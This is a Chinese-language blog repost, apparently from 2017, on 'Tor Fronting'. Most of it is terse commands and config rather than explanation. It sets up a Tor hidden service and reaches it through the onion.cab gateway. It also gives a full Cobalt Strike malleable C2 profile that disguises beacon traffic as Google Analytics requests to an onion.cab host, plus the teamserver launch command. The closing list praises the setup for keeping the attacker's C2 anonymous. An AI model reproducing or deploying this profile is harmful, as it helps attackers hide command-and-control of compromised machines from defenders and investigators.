本文讲的是
隐匿的攻击之-Tor Fronting,
0x01 简介
lsb_release -a
deb http://deb.torproject.org/torproject.org precise main deb-src http://deb.torproject.org/torproject.org precise main
gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
$ sudo apt-get update $ sudo apt-get install tor deb.torproject.org-keyring
HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080
sudo service tor restart
sudo cat /var/lib/tor/hidden_service/hostname
~ cd /tmp ~ python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ...
curl -b 'onion_cab_iKnowShit=yourcookie' 'https://xxxx.onion.cab/1.txt'
# make our C2 look like a Google Web Bug # https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting # # Author: @armitagehacker # Modified by Vincent Yiu @vysecurity for TOR. set sleeptime "5000"; http-get { set uri "/___utm"; client { header "Host" "bjaw6h36vwruhwvb.onion.cab"; header "Cookie" "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d"; metadata { base64url; prepend "__utma"; parameter "utmcc"; } } server { header "Content-Type" "plain/text"; output { # hexdump pixel.gif # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 # 0000020 01 00 01 00 00 02 01 44 00 3b prepend "x01x00x01x00x00x02x01x44x00x3b"; prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00"; prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00"; print; } } } http-post { set uri "/__utm"; set verb "GET"; client { header "Host" "bjaw6h36vwruhwvb.onion.cab"; header "Cookie" "onion_cab_iKnowShit=8919090b066c57c2638a0956e1af4e8d"; id { prepend "UA-220"; append "-2"; parameter "utmac"; } output { base64url; prepend "__utma"; parameter "utmcc"; } } server { header "Content-Type" "plain/text"; output { prepend "x01x00x01x00x00x02x01x44x00x3b"; prepend "xffxffxffx21xf9x04x01x00x00x00x2cx00x00x00x00"; prepend "x47x49x46x38x39x61x01x00x01x00x80x00x00x00x00"; print; } } } # dress up the staging process too http-stager { server { header "Content-Type" "plain/text"; } }
cobal sudo ./teamserver [your ip] hacktest tor-fronting.profile
1、你不需要外网环境,将C2放到Docker或者本地都可以!(但是需要服务器在墙外) 2、使C2匿名; 3、并不需要在目标机上安装Tor; 4、默认是安全的。 5、要求C2上同时安装Cobalt Strike及Tor服务。
原文发布时间为:2017年3月6日
本文作者:Evi1cg
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。